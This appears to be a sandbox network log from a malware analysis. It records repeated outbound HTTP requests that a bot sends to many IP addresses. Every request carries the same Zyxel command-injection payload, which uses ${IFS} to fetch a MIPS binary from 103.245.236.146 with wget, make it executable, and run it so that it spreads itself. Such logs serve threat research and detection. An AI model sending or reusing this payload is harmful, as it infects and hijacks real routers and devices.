                                                  Jan 19, 2024 18:24:01.170671940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5764192.168.2.134919273.206.113.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170712948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5765192.168.2.1352020173.250.236.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170748949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5766192.168.2.1340464139.51.116.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170779943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5767192.168.2.1336382103.101.101.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170840025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5768192.168.2.133880494.41.156.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170866966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5769192.168.2.1353638168.33.200.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170911074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5770192.168.2.135357261.205.30.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170945883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5771192.168.2.1354408123.9.107.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170979977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5772192.168.2.1345402166.243.199.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171014071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5773192.168.2.134916694.57.132.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171056986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5774192.168.2.134675225.212.70.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171078920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5775192.168.2.133566294.171.134.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171130896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5776192.168.2.133902080.250.51.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171168089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5777192.168.2.1359276102.88.169.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171221018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5778192.168.2.1336528193.232.45.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171255112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5779192.168.2.1351576220.121.226.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171310902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5780192.168.2.13329929.114.110.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171339989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5781192.168.2.1338106181.112.126.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171386957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5782192.168.2.134793038.163.90.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171426058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5783192.168.2.1340224120.179.195.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171472073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5784192.168.2.1346472169.73.118.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171508074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5785192.168.2.133800697.88.17.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171540022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5786192.168.2.1342992160.69.37.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171581030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5787192.168.2.1338458196.33.183.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171595097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5788192.168.2.1353748155.8.220.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171637058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5789192.168.2.1348306157.196.16.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171670914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5790192.168.2.1346088102.96.228.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171715975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5791192.168.2.1341402107.5.253.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171745062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5792192.168.2.1355722178.221.211.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171804905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5793192.168.2.1333080140.224.193.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171840906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5794192.168.2.134417698.34.173.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171881914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5795192.168.2.1349530192.123.38.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171915054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5796192.168.2.1340694210.119.116.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171940088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5797192.168.2.1335276105.214.60.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.171977043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5798192.168.2.1344734114.162.204.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172015905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5799192.168.2.134049032.169.189.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172049046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5800192.168.2.135751694.219.170.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172081947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5801192.168.2.1341952134.76.119.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172122955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5802192.168.2.13572701.132.164.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172137976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5803192.168.2.134998695.180.138.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172183037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5804192.168.2.133639038.74.13.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172218084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5805192.168.2.1360992149.55.200.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172261000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5806192.168.2.134595853.199.235.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172278881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5807192.168.2.13519649.82.253.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172329903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5808192.168.2.1336672101.54.227.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172385931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5809192.168.2.134312659.162.18.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172419071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5810192.168.2.135619266.198.95.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172466040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5811192.168.2.1358462176.81.67.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172509909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5812192.168.2.135564654.233.128.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172543049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5813192.168.2.1346224155.187.56.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172595978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5814192.168.2.1350690169.179.51.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172616959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5815192.168.2.1338688219.75.194.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172663927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5816192.168.2.1355082197.201.6.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172724962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5817192.168.2.1348200131.79.177.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172758102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5818192.168.2.1342464139.187.14.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172776937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5819192.168.2.134373634.232.170.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172811031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5820192.168.2.1352464184.168.5.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172835112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5821192.168.2.134766058.74.191.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172867060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5822192.168.2.133792240.67.173.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172903061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5823192.168.2.1338912142.239.204.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172929049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5824192.168.2.1335600199.28.251.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.172990084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5825192.168.2.134181294.201.86.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173036098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5826192.168.2.1335594111.18.128.37443
                                                  TimestampBytes transferredDirectionData
